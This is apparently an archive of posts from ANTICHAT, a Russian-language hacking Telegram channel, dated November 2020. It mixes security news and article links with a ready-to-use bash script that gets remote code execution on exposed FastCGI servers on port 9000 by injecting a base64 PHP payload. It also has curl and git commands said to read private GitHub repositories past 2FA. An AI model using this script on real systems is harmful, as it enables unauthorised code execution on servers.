Size: a a a

ANTICHAT Channel

2020 November 09
ANTICHAT Channel
«База клиентов сайта «РЖД Бонус» утекла в сеть. В ОАО «РЖД» пояснили, что это была попытка взлома»

Так просто попытка или таки успешная попытка?

https://habr.com/ru/news/t/526852/
источник
ANTICHAT Channel
Критичная бага в гитхабе - можно смотреть и скачивать приватные репозитории в обход 2fa:
curl --user login:password https://api.github.com/user/repos
git clone https://login:password@github.com/test_user/private_repo.git
Её правда обещают пофиксить 13 ноября:
https://developer.github.com/v3/auth/
Password authentication to the API will be removed on November 13, 2020
источник
ANTICHAT Channel
Торгую ебалом

https://youtu.be/Rlvh-Spvmo4
источник
ANTICHAT Channel
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
источник
ANTICHAT Channel
Шпионские штучки. Собираем устройство для прослушки — «Хакер»
источник
2020 November 10
ANTICHAT Channel
Minimalistic Local Admin Bruteforcer (Windows Privilege Escalation)

https://www.infosecmatter.com/minimalistic-local-admin-bruteforcer-windows-privilege-escalation/
источник
ANTICHAT Channel
источник
ANTICHAT Channel
источник
ANTICHAT Channel
источник
ANTICHAT Channel
источник
ANTICHAT Channel
источник
ANTICHAT Channel
источник
ANTICHAT Channel
​​Появилось краткое описание уязвимостей, продемонстрированных участниками турнира Tianfu Cup, о котором мы писали вчера.

Среди них удаленное выполнение кода (RCE) в Chrome, Firefox и Safari.

iPhone 11 под управлением iOS 14 был взломан двумя разными командами, но при этом приз за удаленный джейлбрейк никому не достался.
источник
ANTICHAT Channel
Обрываем хосты. Какие опасности подстерегают админов виртуального хостинга #vds #leaks #подписчикам

Считается, что прошаренные и искушенные айтишники надежно защищены от сетевых жуликов, которые наживаются на доверчивых интернет-пользователях. Однако существует категория злоумышленников, которые занимаются конкретно обманом администраторов виртуальных серверов. Сегодня мы поговорим об используемых ими методах и разберем несколько характерных уязвимых мест.

https://xakep.ru/2020/11/10/vds-leaks/
источник
ANTICHAT Channel
Pentesting a banking FTP service.

https://blog.lexfo.fr/pentesting-pesit-ftp.html

#Pentest
источник
ANTICHAT Channel
Apple провела третью за эту осень презентацию. Там представили несколько новинок:

• Процессор M1 для Mac, разработанный Apple после отказа от Intel. Чип основан на ARM-архитектуре — так же, как и процессоры последних iPhone и iPad Air. Мощность CPU и GPU чипа M1 в 2 раза мощнее обычных процессоров в обычном ноутбуке;

• Анонсирован MacBook Air 2020 на чипе M1. Утверждается, что он работает в 3 раза быстрее среднего ноутбука на Windows, проданного в прошлом году. Работать он будет до 18 часов без подзарядки, а стоить от $999 (99 990 рублей);

• Новый Mac mini в 4 раза мощнее прошлого поколения и дешевле на 100 долларов — стартует от $699 (74 990 рублей);

• MacBook Pro 2020 с диагональю 13,3 дюймов оснащён до 16 ГБ оперативной памяти и до 2 ТБ встроенной. Работает 20 часов без подзарядки, цена начинается с $1299 (129 990 рублей)
источник
ANTICHAT Channel
источник
ANTICHAT Channel
источник
ANTICHAT Channel
источник
2020 November 11
ANTICHAT Channel
источник